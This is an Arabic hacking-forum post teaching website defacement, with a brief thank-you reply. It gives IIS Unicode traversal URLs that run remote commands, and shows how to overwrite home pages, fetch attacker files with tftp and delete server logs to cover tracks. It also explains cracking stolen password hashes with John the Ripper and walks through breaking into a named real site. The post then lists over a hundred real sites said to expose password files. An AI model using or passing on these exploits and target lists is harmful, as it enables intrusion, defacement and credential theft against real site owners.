http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
الامر المستخدم لتغيير مسمى الملف
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
لامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
scripts
بهذا الشكل على سبيل المثال :
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده
http://www.xxx.com/scripts/DJ.exe/c+dir+c:
و بعدها يمكن تنفيذ الامر
echo
بالشكل التالي
http://www.xxx.com/scripts/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm
-----------------------------------------------------------------------------------
ملحوظات هامه:
--------------
ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها
index.htm
فممكن ان تكون
index.html , default.html , default.htm , default.asp
فعليك التاكد اولا من اسم الملف و لكن
index.htm
هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال
wwwroot
لذا فلابد من البحث ...
-----------------------------------------------------------------------------------
طريقة استخدام رفع الصفحه بواسطة برنامج
TFTP

سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
حمل برنامج ال
tftp
فهو صغير و مجاني
ضعه في ال
c:
ضع الاندكس او صفحتك المراد رفعها في ايضا ال
c:
شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي:
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
حيث
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح ..
C:inetpubwwwrootindex.htm
هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
-----------------------------------------------------------------------------------
و اخيرا لمسح اللوق
http://www.xxxx.com/_vti_bin
-----------------------------------------------------------------------------------
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال
IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال
ftp server
فمعظم نسخ ال
ftp
لها ثغرات يمكن استغلالها.
---------------------------------------------------------------------
5 - شرح ثغرة اليو***ود وكيفية استغلالها:

اولا ثغرات اليو***ود:
UNICODE - Internet Information Service IIS4 - IIS5
اليو***ود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس

- تعريف باليو***ود .
اليو***ود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
IIS4.0 / IIS5.0
والذي ياتي عادة مع
NT4 / Win2k .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ
IIS4 / IIS5
يبدا ملف
CMD
بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الاوامر المستخدمة بواسطة ملف
.CMD

الاوامر المستخدمه بواسطة ملف الـ
CMD
وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
**************************************************
**********
امر انشاء دليل جديد
http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:\hEx
**************************************************
**********
امر الغاء دليل
http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات.
**************************************************
**********
الامر المستخدم للنسخ
http://www.xxxx.com/msadc/..%c0%af....scripts\hEx.exe
**************************************************
**********
الامر المستخدم للنقل
http://www.xxxx.com/msadc/..%c0%af....pts\hEx.exe+c:\
**************************************************
**********
الامر المستخدم للحذف
http://www.xxxx.com/msadc/..%c0%af....+del+c:\hEx.mdb
**************************************************
**********
الامر المستخدم لتغيير مسمى الملفات http://www.xxxx.com/msadc/..%c0%af....dex.htm+hEx.htm
**************************************************
**********
الامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/msadc/..%c0%af....type+c:\hEx.txt
**************************************************
**********
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/msadc/..%c0%af....cho+sNiper_hEx+>c:\hEx.txt
**************************************************
**********
الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي
http://www.xxxx.com/msadc/hEx.mdb
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..%c1%1....exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%9....exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%a....exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%q....exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%8....exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%9....exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%p.../cmd.exe?/c+dir +c:\

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-كيفية اختصار ثغرة اليو***ود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليو***ود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\
فنحتاج الى نسخ ملف
w3svc.exe
الى مجلد
inetpub\scripts
والامر يكون بهذه الطريقة:
http://www.xxxx.com/msadc/..%c0%af....ripts\w3svc.exe

بعد نسخ ملف
w3svc.exe
الى مجلد
inetpub\scripts
الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\

الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm
بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.e...ay@Hotmail.com+>+c:\inetpub\wwwroot\inde x.htm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيقة نسخ ملف ال
CMD
نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الان بامكاننا استخدام ملف الـ
CMD
الجديد في الثغرة بدلا من الاول بهذا الشكل
http://www.xxxx.com/msadc/..%c0%af....1.exe?c+dir+c:\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
كيفية معرفة مشكلة الـ
Access Denied
والحلول المتبعة لها .
تتم معرفة مشكلة الـ
Access Denied
من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ
Access Denied
فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-

1-لطريقة الاولى نسخ ملف الـ
CMD
الى دليل السيكربت بمسمى
CMD1
فسوف يتاح لك امكانية الكتابة باستخدام الامر
Copy
باستخدام هذا الامر
http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe

- الطريقة الثانية بالتعامل مع الملف2
ssinc.dll
والطريقة كما يلي
اولا انشاء صفحة باسم
test.shtml
تكون هذه الصفحة داخل مجلد
wwwroot/hEx/test.shtml
كتابة هذا الكود داخل الصفحة بحيث ان حرف
A
يتم كتابتة حتى يتعدى 2049 حرف
الان يتم طلب الصفحة من خلال المتصفح
http://www.xxxx.com/test.shtml
الان سوف تظهر لك الصفحة
الان تستطيع الكتابه وتم تخطي مشكلة الـ
Access Denied
اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3-الطريقة الثالثة باستخدام برنامج
NC.exe
بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـ
Temp
في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـ
Temp
مفتوح لعمليات الاب لوود .
4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5-البحث عن ملفات
root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts
وتطبيق الثغرة من خلالها .
-------------------------------------------------------------------------

3-(شرح البرامج)
1- شرح برنامج جون ذاريبر

حط البرنامج في السي
ملاحظة احفظ الباسوورد في نفس ملف البرنامج في ملف
.txt
وتسميه
password
عشان تمشي مع الشرح
-=-=-=-=-=-=-=-=-=-=-=-
س:\البرنامج كيف يشتغل؟
البرنامج يشتغل على الدوس ادخل على الدوس واكتب
cd..
الين يصير شكله كذا
<:c
اكتب john
الحين ناقصك اوامر
ماهي اوامر البرنامج؟
-=-=-=-=-=-=-=-=-=-=-=-
1-امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:
john -w:wordlist.txt password.txt
ملف
wordlist
هي كلمات السر المحتمله و
password
كلمة السر المشفرة
(لا انصح بهذا الاختيار)
-=-=-=-=-=-=-=-=-=-=-=-
2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وصيغته:
john -single passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
3-امر يبحث لك عن الارقام فقط وصيغتة:
john -iD:igits passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
4-امر يبحث عن الحروف الصغيرة:
john -i:Alpha passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
5-امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:
john -i:all passwd.txt
هذا الخيار اذا فشلت فيها كلها لانه طويل بس انه افضل اختيار
-=-=-=-=-=-=-=-=-=-=-=-
طيب انا اخترت اخر واحد وقعد البرنامج ساعة مافك ولا شئ وانا ماني فاضي له بخلي الكمبيوتر شغال وش اسوي؟
عندي الحل اضغط كنترول + شفت +سي او
كنترول+سي
ctrl+shift+c
ctrl+c
-=-=-=-=-=-=-=-=-=-=-=-
كيف اكمل ؟
اكتب
john -restore
وهو يكمل
-------------------------------------------------------------------------

4-( نخترق موقع مع بعض)
اول شي خلينا بالمواقع العادية مو نخترق الياهو مرة وحدة علما بأن اختراق المواقع العاديه سهل.
الحين بعد ما قرأنا الدرس الكبير هذا وفهمناه نبي نطبق اللي فهمناه سوف نخترق موقع مع بعض.
--------------------------
البرامج اللازمة:
Jonh the rippar
WS_FTP pro
-------------------------
بسم الله نبدأ:
1- الحين انا ما راح اتعبكم بالبحث عن موقع به ثغرات انا راح اعطيكم موقع فيه ثغرة وراح ننفذها وهو:
http://www.dsg-art.com/
هذا الموقع مصاب بثغرة ملف الباسوورد اللي هي:
wwwboard/passwd.txt
الحين ننفذ الثغرة
http://www.dsg-art.com/wwwboard/passwd.txt
علشان يطلع لينا اليوزر نيم والباسوورد:
jc:GXQ4cN0fhbptw
jc
اليوزر نيم
GXQ4cN0fhbptw
هذا الباسوورد بس مشفر شلون نفك تشفيره علشان نحصل على الباسوورد الاصلي؟؟؟
طبعا ببرنامج جون ذاريبر والشرح ماله فوق.
اوكي فكينا التشفير والحين صار معانا الباسوورد واليوزر نيم مال الموقع خلاص تمت عمليه الاختراق.
الحين نبي نكتب تم الاختراق بواسطة دارك بوي شلون ؟
طبعا ببرنامج الفتب
WS_FTP PRO
اوكي الحين نحط الباسوورد واليوزر نيم بالبرنامج وندخل على الريموت مال الموقع .
الحين اذا تبي تدمر الموقع طبعا تمحي الملفات الحين في بين الملفات ملف اسمه
index.html
هذا ملف الصفحة الرئيسية للموقع الحين احنا نكون مسويين الملف اللي كاتبين فيه تم اختراق هذا الموقع بواسطة دارك بوي من قبل الحين نمحي الملف اندكس مال الموقع وندخل الملف مالنا من الكومبيوتر بعد اختيار مكانه على الكومبيوتر.
واللي ما يعرف يسوي صفحة اندكس يقولي انا اعلمه وكمثال عليها انا مسوي صفحة علشان بس اخترق موقع احطها وهي:
www.geocities.com/hasssssona
خلاص تم اختراق الموقع وترك رساله لصاحبه تم اختراق الموقع ....
الحين علشان لا يعرفنا صاحب الموقع نروح ونمسح ملفات اللوقو اللي شرحهها فوق.
الان بامكان اي احد قرأهذا الدرس اختراق مواقع عادية بس مو مثل الياهو.
-----------------------------------------------------------------------
5-(مواقع بها ثغرات)




http://www.efn.org/~dalep/wwwboard/passwd.txt
http://www.lionnet.org.tr/118u/wwwboard/passwd.txt
http://members.mint.net/raske/wwwboard/passwd.txt
http://www.avatar-moving.com/kb/wwwboard/passwd.txt
http://espa.virtualave.net/wwwboard/passwd.txt
http://mulerider.saumag.edu/wwwboar...oard-passwd.txt
http://www.kcftoa.org/hazmat/wwwboard/passwd.txt
http://www.go-steeltown.com/classif...oard/passwd.txt
http://www.creative-design.de/kmt/wwwboard/passwd.txt
http://www.kaapeli.fi/~hekata/wwwboard/passwd.txt
http://www.go-steeltown.com/invitat...oard/passwd.txt
http://www.ica1.uni-stuttgart.de/~k...oard/passwd.txt
http://sitemanager.hypermart.net/wwwboard/passwd.txt
http://cgi.snafu.de/utimper/user-cg...oard/passwd.txt
http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt
http://expert.cc.purdue.edu/~pumsan/wwwboard/passwd.txt
http://www.cabinessence.com/brian/s...oard/passwd.txt
http://wrm.hre.ntou.edu.tw/wrm/wwwboard/passwd.txt
http://www.radiocollege.org/rc/wwwboard/passwd.txt
http://www.student.utwente.nl/~here...oard/passwd.txt
http://www.as.ua.edu/arcca/wwwboard/passwd.txt
http://students.cs.byu.edu/~quixote/wwwboard/passwd.txt
http://lrf1.unizar.es/~martin/panze...oard/passwd.txt
http://www.netset.com/~jdennis/wwwboard/passwd.txt
http://www.rit.edu/~jrd4663/cgi-bin/wwwboard/passwd.txt
http://www.i-55.com/andersoninc/wwwboard/passwd.txt
http://www.volker.de/deutsch/kontak...oard/passwd.txt
http://www.ug.cs.sunysb.edu/~boehme...oard/passwd.txt
http://www.cjns.com/cyb/cyberair/wwwboard/passwd.txt
http://www.cabling-design.com/inter...oard/passwd.txt
http://www.educanet.net/privado/con...oard/passwd.txt
http://www.zetor.org/scifi/public_h...oard/passwd.txt
http://www.nwlink.com/~nickguy/wwwboard/passwd.txt
http://www.dj-pool.de/PoolDeutsch/p...oard/passwd.txt
http://gladstone.uoregon.edu/~solsh...oard/passwd.txt
http://ftp.duth.gr/pub/netlib/utk/wwwboard/passwd.txt
http://www.freelance-street.co.uk/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.arts.cuhk.edu.hk/~cmc/in...oard/passwd.txt
http://www.clearlight.com/~brawicz/wwwboard/passwd.txt
http://www.yellowstone-natl-park.co...oard/passwd.txt
http://www.mtsu.edu/~ccurry/sets/ex...oard/passwd.txt
http://www.kaibutsu-thx.com/cx/htm/wwwboard/passwd.txt
http://www.kidlink.org/KIDPROJ/Brid...oard/passwd.txt
http://www.markoschulz.de/scripte/f...oard/passwd.txt
http://crux.baker.edu/myeake01/wwwboard/passwd.txt
http://207.65.96.29/users/akira/wwwboard/passwd.txt
http://hkbne.virtualave.net/wwwboard/password.txt
http://gybe.com/boggy/swallowtails/wwwboard/passwd.txt
http://gazissax.best.vwh.net/alsira...oard/passwd.txt
http://www.deltakappagamma.org/Inte...oard/passwd.txt
http://pepup.hypermart.net/wwwboard/passwd.txt
http://www.utexas.edu/depts/asih/wwwboard/passwd.txt
http://hemi.ps.tsoa.nyu.edu/webchat/passwd.txt
http://www.stenum.at/euinfo/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.pnpi.spb.ru/nrd/ucn/cgi-...dmin/passwd.txt
http://gazissax.best.vwh.net/alsira...oard/passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://students.washington.edu/msa/waami/passwd.txt
http://member.mfea.com/Members/bbs/admin/passwd.txt
http://ais.gmd.de/~sylla/Archive/passwd.txt
http://www.lvadb.nl/regionalisering...9874/passwd.txt
http://www.jump.net/~alan****/discu...9311/passwd.txt
http://www.notam.com/forum/passwd.txt
http://www.sandiego.edu/~deroche/group4p/passwd.txt
http://www.sandiego.edu/~deroche/case7/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.swe.org/SWE/Convention/den01/passwd.txt
http://www.colorado.edu/geography/g...sion/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://dykesworld.de/Boards/sistah/passwd.txt
http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt
http://www.pnpi.spb.ru/nrd/ucn/cgi-...dmin/passwd.txt
http://www.pnpi.spb.ru/nrd/ucn/cgi-...s_admin/log.txt
http://www.pnpi.spb.ru/nrd/ucn/cgi-...in/adminlog.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.defenders.by.ru/texts/unix/unix-passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/...ulum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://gazissax.best.vwh.net/alsira...oard/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://www.usd.edu/phys/courses/ast...bord/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.fh-potsdam.de/~potsmods/...ster/passwd.txt
http://www.endicott.edu/staff/kuhn/...9812/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.utexas.edu/depts/grg/vir...sion/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt
http://pages.globetrotter.net/lhibb...oard/passwd.txt
http://wealth-connection.com/bbs/passwd.txt
http://xipe.insp.mx/wwwboard/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://c25c250.best.vwh.net/restricted/passwd.txt
http://www.sandiego.edu/~deroche/case2/passwd.txt
http://www.sandiego.edu/~deroche/group6p/passwd.txt
http://home.gwi.net/~actonfd/bboard/passwd.txt
http://pages.stern.nyu.edu/~rgarud/helpchat/passwd.txt
http://acpon1.ponce.inter.edu/forums/prueba/passwd.txt
http://www.gugten.com/_pub/ARPA/forum/passwd.txt
http://library.thinkquest.org/~1013...dmin/passwd.txt
ثغرات فرونت بيج:
www.ebc.uu.se/evolmuseum/_vti_pvt/
http://www.ebc.uu.se/klubban/_vti_pvt/
http://police.hypermart.net/_vti_pvt/
http://www.seanachie.com/_vti_pvt/
http://www.ahpcc.unm.edu/~aroberts/main/_vti_pvt/
http://www.ahpcc.unm.edu/~aroberts/main/main/_vti_pvt/
http://www.tpeditor.com/_vti_pvt/
http://www.sussex.ac.uk/tcmr/pgp/pgp2/_vti_pvt/
http://www.sussex.ac.uk/Units/IRPol/MAnews/_vti_pvt/
http://members.aol.com/r1953young/_vti_pvt/
http://www.lic.wisc.edu/shapingdane/_vti_pvt/
http://www.gvc.gu.se/ngeo/ng-hem/china/_vti_pvt/
http://www.robertsmyth.leics.sch.uk/_vti_pvt/
http://www.www.nr/My%20Webs/_vti_pvt/
http://siteventos.org.gt/tal_1/_vti_pvt/
http://siteventos.org.gt/redes/_vti_pvt/
http://virtation.com/_vti_pvt/
http://www.ch.ic.ac.uk/bbc/BCG/bcg2001/myweb/_vti_pvt/
http://www.imolbio.oeaw.ac.at/xenopus/_vti_pvt/
http://www.humgym-meran.it/_vti_pvt/
http://www.ceeinet.umd.edu/faculty/ahaghani/_vti_pvt/
http://www.chu-stlouis.fr/hematoonco/_vti_pvt/
http://www.ch.ic.ac.uk/local/projec...thorn/_vti_pvt/
http://www.ce.cmu.edu/~mcnamara/_vti_pvt/
http://www.fht-stuttgart.de/fbv/fbvweb/ipo/_vti_pvt/
http://www.cem.ufpr.br/ecoturismo/_vti_pvt/
http://www.net1.net/~akiecke/_vti_pvt/
http://www.bridgewater.edu/departme...tisms/_vti_pvt/
http://www.lu.lv/jauna/strukt/jgs/_vti_pvt/
http://www.jmtrep.hpg.com.br/_vti_pvt/
http://alpha.tamu.edu/public/jae/_vti_pvt/
http://homepages.newnet.co.uk/netwo...k2000/_vti_pvt/
http://www.ff.up.pt/sirigaitas/_vti_pvt/
http://www.cyclecoachingscotland.fr...co.uk/_vti_pvt/
http://members.aol.com/tamaranth/_vti_pvt/
http://www.bridgewater.edu/departme...owman/_vti_pvt/
http://www.css.orst.edu/barley/_vti_pvt/
http://www.nilc.org.ge/geohealth/_vti_pvt/
http://www.memorial.fund.ukf.net/_vti_pvt/
http://www.ipe.csic.es/cursos.escos/_vti_pvt/
http://dnr.state.il.us/legislation/isah/_vti_pvt/
http://www.rrk-berlin.de/rrkweb/chirurgie/_vti_pvt/
http://www.jtr.gov.my/fik/_vti_pvt/
http://ww1.baywell.ne.jp/fpweb/drlatham/_vti_pvt/
http://www.wms-access.com/Photo%20Gallery/_VTI_PVT/
http://www.lfp.cz/primaire/_vti_pvt/
http://www.zs3zab.cz/_vti_pvt/service.pwd
http://pages.citenet.net/users/ctmx...pvt/service.pwd
http://ftp.scu.edu.tw/_vti_pvt/service.pwd
http://orion.ifsi.rm.cnr.it/meeting...pvt/service.pwd
http://www.momentus.com.br/users/le...pvt/service.pwd
http://www2.alpinecom.net/_vti_pvt/service.pwd
http://www.necc.cc.ms.us/~jpowell/_vti_pvt/service.pwd
http://conca.users.netlink.co.uk/_vti_pvt/service.pwd
/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex. htm /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log



______________________
منقول للفائدة




[ldu 'vr hojvhr hgl,hru lil []h Vip pwvdh ugn lkj]d


التعديل الأخير تم بواسطة dz-sniper ; 04-05-2010 الساعة 02:49 AM.

   

رد مع اقتباس
قديم 04-05-2010, 03:02 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
Hαcĸer'ѕ Kιɴɢ
:: Interactive Developer ::
 
الصورة الرمزية Hαcĸer'ѕ Kιɴɢ
 

 

 
إحصائية العضو








Hαcĸer'ѕ Kιɴɢ غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hαcĸer'ѕ Kιɴɢ

 

 

إحصائية الترشيح

عدد النقاط : 10
Hαcĸer'ѕ Kιɴɢ is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع

** إن مرت الايام ولم تروني فهذه مشاركاتي فـتذكروني

وان غبت ولم تجدوني اكون وقتها بحاجه للدعاء فادعولي **

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
جميع البرامج التي استعملها في اختراق المواقع هناا فقط Zero قـسـم أدوات واندكـسات الإختراق 29 12-11-2010 11:09 AM
[أوامر] جميع اوامر اختراق المواقع بالدوس MATRIX ALGERIA قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 8 06-05-2010 12:36 AM
جميع اوامر الدوس في اختراق المواقع z3r0 b0mb3r قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 6 05-10-2010 03:08 AM
حصريا على منتدى العناكب أكبر شرح على المستوى العربي لحمايه الاجهزه في عده نقاط مع ابو بدر ابو بدر قســم إختــراق الأجهــزة 8 06-05-2009 11:37 AM


الساعة الآن 04:17 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0